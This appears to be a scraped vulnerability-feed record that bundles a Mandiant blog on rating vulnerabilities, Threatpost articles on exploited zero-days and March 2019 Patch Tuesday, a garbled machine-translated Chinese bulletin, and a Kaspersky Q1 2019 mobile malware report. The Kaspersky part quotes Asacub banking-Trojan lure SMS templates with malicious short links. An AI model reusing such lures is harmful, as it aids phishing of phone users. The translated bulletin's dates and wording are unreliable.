\nExploitation Vector\n\n| \n\nWhat methods can be used to exploit the vulnerability? \n \nAttacking Ease\n\n| \n\nHow difficult is the exploit to use in practice? \n \nExploit Reliability\n\n| \n\nHow consistently can the exploit execute and perform the intended malicious activity? \n \nAccess Vector\n\n| \n\nWhat type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability? \n \nAccess Complexity\n\n| \n\nHow difficult is it to gain access needed for the vulnerability? \n \nAuthentication Requirements\n\n| \n\nDoes the exploitation require authentication and, if so, what type of authentication? \n \nVulnerable Product Ubiquity\n\n| \n\nHow commonly is the vulnerable product used in enterprise environments? \n \nProduct's Targeting Value\n\n| \n\nHow attractive is the vulnerable software product or device to threat actors to target? \n \nVulnerable Configurations\n\n| \n\nDoes exploitation require specific configurations, either default or non-standard? \n \n#### Mandiant Vulnerability Rating System Applied\n\nThe following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.\n\n**Vulnerability**\n\n| \n\n**Vulnerability Description**\n\n| \n\n**NVD Rating**\n\n| \n\n**Mandiant Rating**\n\n| \n\n**Explanation** \n \n---|---|---|---|--- \n \nCVE-2019-12650\n\n| \n\nA command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges****\n\n| \n\nHigh\n\n| \n\nLow\n\n| \n\nThis vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges \u2013 level 15 admin privileges \u2013 to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this activity.**** \n \nCVE-2019-5786\n\n| \n\nA use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code. \n\n** **\n\n| \n\nMedium\n\n| \n\nHigh\n\n| \n\nNVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild which results in remote code execution in the context of the renderer, which is a more serious outcome.**** \n \nAs demonstrated, factors such as the assessed ease of exploitation and the observance of exploitation in the wild may result a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the required privileges needed to execute the vulnerability as well as the lack of observed exploitation. On the other hand, we rated the CVE-2019-5786 as high risk due to the assessed severity, ubiquity of the software, and confirmed exploitation.\n\nIn early 2019, Google [reported](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html>) two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability pushed it to users through Chrome\u2019s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems, Windows, Mac OS, and Linux, and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public [blog post](<https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/>) and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.\n\n#### The Future of Vulnerability Analysis Requires Algorithms _and_ Human Intelligence\n\nWe expect that the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.\n\nMandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.\n\nHuman curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-20T12:00:00", "published": "2020-04-20T12:00:00", "id": "FIREEYE:173497473E4F8289490BBFFF8E828EC9", "href": "https://www.fireeye.com/blog/threat-research/2020/04/how-mandiant-intelligence-rates-vulnerabilities.html", "type": "fireeye", "title": "Separating the Signal from the Noise: How Mandiant Intelligence Rates\nVulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-09T11:22:56", "bulletinFamily": "info", "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0808", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-5786", "CVE-2020-0674"], "description": "Google has registered a significant drop in government-backed cyberattacks against its properties and the people who use its products.\n\nGoogle sends out warnings if it detects that an account is a target of government-backed phishing or malware attempts. For 2019, the internet giant sent almost 40,000 warnings \u2013 which, while a large number, is still a nearly 25 percent drop from the year before.\n\n**Nation-State Trends**\n\nIn terms of trends amongst the warnings, the analysis showed that main targets included, perhaps unsurprisingly, geopolitical rivals, government officials, journalists, dissidents and activists.\n\nIn 2019, about 20 percent of accounts that received a warning were targeted multiple times by attackers. Google also uncovered that phishing and zero-day exploits continue to be APT weapons of choice.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOn the former front, Google researchers saw a growing trend emerge towards impersonating news outlets and journalists, especially when it comes to attackers from Iran and North Korea.\n\n\u201cFor example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation,\u201d explained Toni Gidwani, security engineering manager at the company\u2019s Threat Analysis Group (TAG), writing [in an overview](<https://blog.google/technology/safety-security/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/amp/>) of nation-state trends, published last week. \u201cIn other cases, attackers will send several benign emails to build a rapport with a journalist or foreign-policy expert before sending a malicious attachment in a follow up email.\u201d\n\nOn the zero-day front, TAG discovered bugs affecting Android, Chrome, iOS, Internet Explorer and Windows over the course of last year, including CVE-2020-0674. This is a [memory-corruption vulnerability disclosed in late January](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), a critical flaw for most Internet Explorer versions, allowing remote code-execution and complete takeover.\n\nOther notable bugs included [CVE-2018-8653](<https://threatpost.com/microsoft-ie-zero-day-gets-emergency-patch/140185/>), [CVE-2019-0676](<https://threatpost.com/microsoft-patches-zero-day-browser-bug-under-active-attack/141755/>), [CVE-2019-1367](<https://threatpost.com/microsoft-internet-explorer-zero-day-flaw-addressed-in-out-of-band-security-update/148584/>) and [CVE-2019-1429](<https://threatpost.com/microsoft-patches-rce-bug/150136/>) in Internet Explorer; [CVE-2019-5786](<https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/>) in Chrome; and [CVE-2019-0808](<https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/>) in Windows Kernel.\n\n**Zero-Day Details**\n\nThree bugs (CVE-2018-8653, CVE-2019-1367 and CVE-2020-0674) are vulnerabilities inside jscript.dll, Gidwani said. \u201cTherefore all exploits enabled IE8 rendering and used JScript.Compact as JS engine. In most Internet Explorer exploits, attackers abused the Enumerator object in order to gain remote code execution.\u201d\n\nMeanwhile, CVE-2019-0676 \u201cenables attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered,\u201d according to the writeup.\n\nAnd, \u201cthe attack vector for CVE-2019-1367 was rather atypical as the exploit was delivered from an Office document abusing the online video embedding feature to load an external URL conducting the exploitation.\u201d\n\nIn one campaign, a single APT was seen using five zero-day exploits, delivered using watering-hole attacks, links to malicious websites and inemail attachments in targeted spear-phishing campaigns.\n\n\u201cFinding this many zero-day exploits from the same actor in a relatively short time frame is rare,\u201d said Gidwani. \u201cThe majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.\u201d\n\nNonetheless, he said that it\u2019s encouraging to see the decline in attacks.\n\n\u201cOne reason for this decline is that our new protections are working,\u201d said Gidwani. \u201cAttackers\u2019 efforts have been slowed down and they\u2019re more deliberate in their attempts, meaning attempts are happening less frequently as attackers adapt.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-03-30T20:53:22", "published": "2020-03-30T20:53:22", "id": "THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B", "href": "https://threatpost.com/nation-state-attacks-google-analysis/154295/", "type": "threatpost", "title": "Nation-State Attacks Drop in Latest Google Analysis", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-15T11:44:46", "bulletinFamily": "info", "cvelist": ["CVE-2019-0592", "CVE-2019-0683", "CVE-2019-0697", "CVE-2019-0698", "CVE-2019-0726", "CVE-2019-0754", "CVE-2019-0757", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-0809", "CVE-2019-5786"], "description": "Microsoft released patches for two Win32k bugs actively under attack, along with fixes for four additional bugs that are publicly known, as part of its March Patch Tuesday security bulletin. The Win32k bugs are both elevation of privilege vulnerabilities, rated important, and tied to the way Windows handles objects in memory.\n\n\u201cAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d wrote Microsoft in its security bulletin for both Win32k bugs ([CVE-2019-0797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797>), [CVE-2019-0808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808>)).\n\nOne of the bugs being actively exploited was reported by Kaspersky Lab, while the other was reported by the Google Threat Analysis Group. News broke last week that two vulnerabilities \u2013 CVE-2019-0808 and a separate Google Chrome [CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>) \u2013 were being actively exploited in the wild together. Now all three zero-days have been patched.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe four additional bugs, rated important, which are publicly known exploits ([CVE-2019-0683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0683>), [CVE-2019-0754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0754>), [CVE-2019-0757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0757>) and [CVE-2019-0809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0809>)), ranged from an Active Directory elevation of privilege vulnerability to a Windows denial of service vulnerability.\n\nThe most interesting of the above bugs is CVE-2019-0757 \u2013 a NuGet package manager tampering vulnerability. According to commentary by researchers at the Zero Day Initiative, the patch corrects a bug in the NuGet package manager that allows an attacker to modify a package\u2019s folder structure.\n\n\u201cIf successful, [an adversary] could modify files and folders that are unpackaged on a system,\u201d ZDI wrote. \u201cIf done silently, an attacker could potentially propagate their modified package to many unsuspecting users of the package manager. Fortunately, this requires authentication, which greatly reduces the chances of this occurring. This is one of the four publicly known bugs for this month, so if you\u2019re a NuGet user, definitely get this patch.\u201d\n\n## 17 Critical Bugs, Slayed\n\nIn all, Microsoft reported 64 unique bugs, 17 critical, 45 rated important, one moderate and one rated low in severity.\n\n\u201cThere are three Windows DHCP Client Remote Code Execution vulnerabilities with a 9.8 CVSS score in this month\u2019s release,\u201d wrote Satnam Narang, senior research engineer at Tenable in security brief. \u201cThis is the third straight month that Microsoft patched high severity bugs in either Windows DHCP Client or Windows DHCP Server, signaling increased attention on finding DHCP bugs.\u201d\n\nThose DHCP bugs ([CVE-2019-0697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0697>), [CVE-2019-0698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0698>), [CVE-2019-0726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0726>)) could allow attackers to execute their code in the DHCP client on affected systems.\n\n\u201cThese bugs are particularly impactful since they require no user interaction \u2013 an attacker send a specially crafted response to a client \u2013 and every OS has a DHCP client,\u201d wrote [Dustin Childs in a blog post on the ZDI](<https://www.zerodayinitiative.com/blog/2019/3/12/the-march-2019-security-update-review>). \u201cThere would likely need to be a man-in-the-middle component to properly execute an attack, but a successful exploit would have wide-ranging consequences.\u201d\n\n## Battling Bad Scripting\n\nThis month\u2019s critical and important bug fixes were dominated by code execution flaws impacting Microsoft\u2019s Edge and Internet Explorer browsers. A Chakra scripting engine memory corruption vulnerability ([CVE-2019-0592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0592>)) patched by Microsoft is typical.\n\nThe flaw (CVE-2019-0592) is tied to the way the Chakra JavaScript scripting engine handles objects in memory in Microsoft Edge. \u201cAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system,\u201d Microsoft wrote. The attack scenario includes a booby-trapped website where specially crafted content triggers the attack chain.\n\nOn Tuesday, Microsoft also include three advisories. Here they are verbatim:\n\n * [ADV190009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190009>) announces SHA-2 Code Sign support for Windows 7 SP1 and Windows Server 2008 R2. This update will be [required](<https://support.microsoft.com/en-us/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus>) for any new patches released after July 2019. Older versions of WSUS should also be updated to distribute the new SHA-2 signed patches.\n * [ADV190005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190005>) gives guidance on sharing the same user account across multiple users. Microsoft discourages this behavior and considers it a major security risk.\n * [ADV190005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190005>) provides mitigations for a potential denial-of-service in http.sys when receiving HTTP/2 requests. The patch allows users to set a limit on how many SETTINGS parameters can be sent in a single request.\n\n**_Don\u2019t miss our free live _****_[Threatpost webinar](<https://attendee.gotowebinar.com/register/6499105876772027139?source=ART>)_****_, \u201cExploring the Top 15 Most Common Vulnerabilities with HackerOne and GitHub,\u201d on Wed., Mar 20, at 2:00 p.m. ET._**\n\n**_Vulnerability experts Michiel Prins, co-founder of webinar sponsor HackerOne, and Greg Ose, GitHub\u2019s application security engineering manager, will join Threatpost editor Tom Spring to discuss what vulnerability types are most common in today\u2019s software, and what kind of impact they would have on organizations if exploited._**\n", "modified": "2019-03-12T21:52:31", "published": "2019-03-12T21:52:31", "id": "THREATPOST:0C6C1B17AFD30FEDE0604F98C6C93413", "href": "https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/", "type": "threatpost", "title": "Microsoft Patches Two Win32k Bugs Under Active Attack", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-16T23:58:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-0797", "CVE-2019-0808", "CVE-2019-0697", "CVE-2019-0626", "CVE-2019-0726", "CVE-2019-0698", "CVE-2018-8476", "CVE-2019-5786", "CVE-2019-0603"], "description": "GMT 2019 3 October 14, Microsoft issued a routine security update, patching Internet Explorer, Edge, Exchange Server, ChakraCore, Windows, Office, NuGet\u5305\u7ba1\u7406\u5668\u548c.NET Framework of multiple products in a vulnerability. This 64 CVE, 17 were rated as severe(Critical), 45 were rated as important(Important), one was rated medium(Moderate), one was rated as low(Low). Four of the vulnerabilities are classified as public, the two vulnerabilities released patches before attackers take advantage of. A few of the more important of the vulnerability details are as follows. \nCVE-2019-0797: this is Kaspersky Lab recently found in the Wild being used and reports of a fourth windows kernel 0day vulnerability to be found the EXP for from win8 to win10 build 15063 64-bit system. Kaspersky Lab believes that this vulnerability is more APT organization uses, including but not limited to FruityArmor and SandCat on. In Kaspersky's blog provides some technical details: The fourth horseman: CVE-2019-0797 vulnerability \nCVE-2019-0808: this is a google found in the wild and the chrome 0day exploit with sandbox escape windows kernel 0day vulnerability, after 360CERT has been released. warning: CVE-2019-5786: chrome in the wild exploit 0day vulnerability warning. 360 Core Security Technology Center by writing code to construct a POC for a vulnerability to trigger the process for some of the reduction, so that security vendors can increase the appropriate protective measures: about CVE-2019-0808 kernel mention the right vulnerability cause analysis. The vulnerability is a NULL pointer dereference vulnerability, only in win7 on the use, it is found that the EXP for win7 32-bit system. \nCVE-2019-0697, CVE-2019-0698, CVE-2019-0726: this is the month to repair the three DHCP-related vulnerabilities. Domestic and international security research team for last month repair DHCP in CVE-2019-0626 issued a technical analysis: the Windows DHCP Server Remote Code Execution Vulnerability Analysis CVE-2019-0626; and Analyzing a Windows DHCP Server Bug (CVE-2019-0626)\u3002 When the attacker sends to the DHCP server well-designed data packet and successfully exploited, it can be in the DHCP service in the execution of arbitrary code. Microsoft has released for win10 1803/1809 and windows server 2019/1803 patch. \nCVE-2019-0603: the vulnerability could allow an attacker via a specially crafted TFTP message executed with elevated privileges code. 2019 3 May 6, checkpoint released a blog post discloses 2018 11 on the repair of the TFTP in CVE-2018-8476: the PXE Dust: Finding a Vulnerability in Windows Servers Deployment Services. The vulnerability is similar to CVE-2018-8476, but this vulnerability in the TFTP service implementation, but not in the TFTP Protocol itself. windows released from win7 to win10 multiple versions of the patch. \nIn view of this month to fix multiple vulnerabilities affecting serious, some technical details of the disclosure, 360CERT recommended that the majority of users as soon as possible for repair. \n\n0x01 timeline \n2019-03-13 Microsoft issued a routine security update \n2019-03-15 360CERT assessment of vulnerabilities, post vulnerabilities and Early Warning Bulletin \n\n", "edition": 1, "modified": "2019-03-17T00:00:00", "published": "2019-03-17T00:00:00", "id": "MYHACK58:62201993173", "href": "http://www.myhack58.com/Article/html/3/62/2019/93173.htm", "title": "By 2019, 3-month Microsoft patch day multiple vulnerabilities early warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-05-29T14:29:14", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most 